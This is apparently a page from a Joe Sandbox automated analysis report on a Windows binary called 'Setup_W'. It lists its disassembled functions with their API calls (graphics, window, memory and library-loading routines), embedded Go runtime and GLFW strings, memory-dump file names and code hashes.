Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Dragfree$Querycalloc$ByteCharFileFinishMultiPointWide
String ID:
API String ID: 1836115470-0
Opcode ID: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
Instruction ID: 21f17271d0a1d0e5aecf1946cead42c5bd2f030e09ed4893c2bcaf0234a1ece6
Opcode Fuzzy Hash: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
Instruction Fuzzy Hash: DF3168B4908704DFDB04EFA9C58869EFBF4FF89704F01891EE4989B250DB3498859B46

Function 64611F30 Relevance: 12.1, APIs: 8, Instructions: 55COMMON

Download Yara Rule

APIs

wcstombs.MSVCRT ref: 64611F58
malloc.MSVCRT ref: 64611F6C
wcstombs.MSVCRT ref: 64611F82
wcstombs.MSVCRT ref: 64611F9C
malloc.MSVCRT ref: 64611FB0
wcstombs.MSVCRT ref: 64611FC6
_assert.MSVCRT ref: 64611FD6
free.MSVCRT ref: 64611FDE

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: wcstombs$malloc$_assertfree
String ID:
API String ID: 3121319774-0
Opcode ID: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
Instruction ID: 56ca28514d4b1eca7c89cc07d14b80c7523b2de6cc68beb86310f996ff092ddc
Opcode Fuzzy Hash: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
Instruction Fuzzy Hash: DA11DDB440C7049FD300EF29C08469EFBF1EF8A654F11CA2EE59887350D7759489DB96

Function 009C35A0 Relevance: 11.4, Strings: 9, Instructions: 172COMMON

Download Yara Rule

Strings

bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowglfw: %s: %sharddecommithost is downhttp2debug=1http2deb, xrefs: 009C37AA
CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writeclock: QueryPerformanceCounter failed: errno: %dcould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadgraphicscommand: the, xrefs: 009C3860
: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 009C3887
runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len i, xrefs: 009C382C
VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer, xrefs: 009C3805
runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait , xrefs: 009C373B
: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)t, xrefs: 009C38BB
%, xrefs: 009C38C4
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 009C37D1

Memory Dump Source

Source File: 00000000.00000002.2012483524.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000000.00000002.2012469084.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012633658.0000000000BE8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012633658.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012788116.0000000000E57000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012802441.0000000000E60000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012844036.0000000000F03000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012855315.0000000000F05000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012866010.0000000000F06000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012876851.0000000000F07000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012888016.0000000000F08000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F0A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F33000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012957027.0000000000F3A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012968805.0000000000F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012968805.0000000000F5A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_990000_Setup_W.jbxd

Similarity

API ID:
String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)t$%$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writeclock: QueryPerformanceCounter failed: errno: %dcould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadgraphicscommand: the$VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer$bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowglfw: %s: %sharddecommithost is downhttp2debug=1http2deb$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len i$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait
API String ID: 0-3256493565
Opcode ID: 6f4e1f2d640cd9b8e3e1593d8ec1e039d40b1190389c5a7723dc0dc2770d489d
Instruction ID: c697bafc0353355befbb81eae5209afef794e9a2bcd0f42526a538a52c226626
Opcode Fuzzy Hash: 6f4e1f2d640cd9b8e3e1593d8ec1e039d40b1190389c5a7723dc0dc2770d489d
Instruction Fuzzy Hash: 2C81BFB49087418FD340EF64C199B5EBBE4AF88744F00892DF4989B352DB78DA498F53

Function 64606BCB Relevance: 10.6, APIs: 7, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,64606DDE), ref: 64606BEC
GetProcAddress.KERNEL32 ref: 64606C29

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: AddressLibraryLoadProccallocstrcpy
String ID:
API String ID: 3191970723-0
Opcode ID: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
Instruction ID: f0646acfb52e7e7914e8e69514eb6b0ed57cf7e0ba1799fa8941cc7d4de1ebcc
Opcode Fuzzy Hash: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
Instruction Fuzzy Hash: B04118B090C3519BD716AF65D64439EBBF4EF66B48F01E85EE8848B240D77988C4CB53

Function 646086AB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 6460870F
VerSetConditionMask.KERNEL32 ref: 6460872B
VerSetConditionMask.KERNEL32 ref: 64608747
RtlVerifyVersionInfo.NTDLL ref: 64608765

Strings

, xrefs: 64608738
#, xrefs: 6460875A

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID: $#
API String ID: 2793162063-2491617062
Opcode ID: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
Instruction ID: 8ac03f99b4996b812ac9ca3971312d0a604f99c29dc6038d0a7191f675425ea0
Opcode Fuzzy Hash: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
Instruction Fuzzy Hash: 6011DAB08083089FDB10AF69C5493AEBBF4EF88354F00C85DE89887281E3B99554CF82

Function 64609118 Relevance: 10.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 6460915A
memcmp.MSVCRT ref: 64609187
memcmp.MSVCRT ref: 646092B0

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
Instruction ID: df5c36a09866d2bcf33a00dd3babb0bf3a192e59e48267d6dc1dba8cacacb17f
Opcode Fuzzy Hash: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
Instruction Fuzzy Hash: 8551F5B0A08745DBEB05DF19C68479ABFF1EF95748F00C81DE8988B294E374D489DB82

Function 6460A331 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 6460A359

Part of subcall function 64609F84: EnumDisplaySettingsW.USER32 ref: 64609FF5
Part of subcall function 64609F84: CreateDCW.GDI32 ref: 6460A01F
Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A05B
Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A070
Part of subcall function 64609F84: DeleteDC.GDI32 ref: 6460A164
Part of subcall function 64609F84: free.MSVCRT ref: 6460A186
Part of subcall function 64609F84: wcscpy.MSVCRT ref: 6460A1B4
Part of subcall function 64609F84: WideCharToMultiByte.KERNEL32(00000000), ref: 6460A202

EnumDisplayDevicesW.USER32 ref: 6460A3B9
EnumDisplayDevicesW.USER32 ref: 6460A41F
wcscmp.MSVCRT ref: 6460A469
wcscmp.MSVCRT ref: 6460A4ED
free.MSVCRT ref: 6460A565

Part of subcall function 646057C8: realloc.MSVCRT ref: 646057FC
Part of subcall function 646057C8: memmove.MSVCRT ref: 64605825

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: DisplayEnum$CapsDeviceDevicesfreewcscmp$ByteCharCreateDeleteMultiSettingsWidecallocmemmovereallocwcscpy
String ID:
API String ID: 579719053-0
Opcode ID: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
Instruction ID: dcd89fd2c13b460c3e6eb5867185efa4242b4b2248a255bf9b5c91e267a74ee1
Opcode Fuzzy Hash: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
Instruction Fuzzy Hash: A9514EB19083158FEB15DF28C94439EBBF5BFA5784F00C8ADD888A7200E776D9958F42

Function 6460BD39 Relevance: 9.1, APIs: 6, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 6460BD5C
GetSystemMetrics.USER32 ref: 6460BD68
GetClassLongW.USER32 ref: 6460BE53
GetClassLongW.USER32 ref: 6460BE6A
DestroyIcon.USER32 ref: 6460BECD
DestroyIcon.USER32 ref: 6460BEE1

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ClassDestroyIconLongMetricsSystem
String ID:
API String ID: 902249451-0
Opcode ID: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
Instruction ID: 713f0ba8414f9aa3487a0b640c95419bedf34daf1fda783aefc2163a129a0fcc
Opcode Fuzzy Hash: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
Instruction Fuzzy Hash: C8517A71A04205DFDB04EFA9C9486AEBBF9EF89710F01C529E898DB390DB789841CF51

Function 64601020 Relevance: 9.1, APIs: 6, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,646012C1,?,?,?,?,?,?,646013D3), ref: 64601057
_amsg_exit.MSVCRT ref: 64601085

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
Instruction ID: d62b50c69b97806eec955e296aaed03516669fdb76f59aa6d42e2eb3e52d9b3f
Opcode Fuzzy Hash: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
Instruction Fuzzy Hash: 03418F7164C290CBE716EF5AC68139B7BA0EB66748F40C52DE4848B241DB77C580CBD2

Function 64609317 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 64609377
free.MSVCRT ref: 6460939E
free.MSVCRT ref: 646094B4

Strings

, xrefs: 646093CA
, xrefs: 646093D4

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: free$calloc
String ID: $
API String ID: 3095843317-227171996
Opcode ID: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
Instruction ID: 37b25af67d1840a2031605d6addd8f798cfa9e2af2e1ac235572a749ba1644fb
Opcode Fuzzy Hash: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
Instruction Fuzzy Hash: 7041E870908718CFDB65DF29C9847D9BBF1EB89708F0088A9D59C97250D7759A88CF82

Function 6460B4A7 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 6460B4B8
WindowFromPoint.USER32(64633B20,?,?,?,?,?,?,?,?,?,?,?,?,64633B20,?,6460E287), ref: 6460B4D4
GetClientRect.USER32 ref: 6460B4EE
ClientToScreen.USER32(00000000,00000000), ref: 6460B509
ClientToScreen.USER32 ref: 6460B51D
PtInRect.USER32 ref: 6460B532

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Client$RectScreen$CursorFromPointWindow
String ID:
API String ID: 3638364385-0
Opcode ID: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
Instruction ID: 3b0094546bf2133344687ff90385f188bb14cb557acdc0aefd7f0507a1609907
Opcode Fuzzy Hash: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
Instruction Fuzzy Hash: C711DDB5909614EFCB01EFA9D98499EBBF8FF89B11F01C429E988D7205D7309805CB61

Function 6460A5C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

GetDC.USER32 ref: 6460A61D
GetDeviceCaps.GDI32 ref: 6460A637
GetDeviceCaps.GDI32 ref: 6460A649
ReleaseDC.USER32(73A24620,73A24620), ref: 6460A65B

Strings

Z, xrefs: 6460A63E

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ConditionMask$CapsDevice$InfoReleaseVerifyVersion
String ID: Z
API String ID: 1822872229-1505515367
Opcode ID: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
Instruction ID: 707d5dd32e3a15a051cc870e2508f533cae2b5a77f41d0fd4278f5d9a3e11ce2
Opcode Fuzzy Hash: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
Instruction Fuzzy Hash: 6B21D5B0908619EFDB049FAAC94879EBBF4FF49755F01C41AE89897240D7789414CF51

Function 646019DC Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

Strings

Cannot query extension without a current OpenGL or OpenGL ES context, xrefs: 64601A43
glfw/src/context.c, xrefs: 646019F4
JCad, xrefs: 64601ACF
extension != NULL, xrefs: 646019FC

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Valuestrlenstrstr
String ID: Cannot query extension without a current OpenGL or OpenGL ES context$JCad$extension != NULL$glfw/src/context.c
API String ID: 1011161555-1144784644
Opcode ID: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
Instruction ID: ab578d73ec95341dca835a5dd6844567f22864d8ff57f30a04dc3bc4f80d642d
Opcode Fuzzy Hash: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
Instruction Fuzzy Hash: 2D3129B0A482059FD7059FA9C6446DEBFF4EF95B48F01C92EE8C88B201E7B58481CB52

Function 64611DF0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 64611E09
_unlock.MSVCRT ref: 64611E31
calloc.MSVCRT ref: 64611E7F

Memory Dump Source

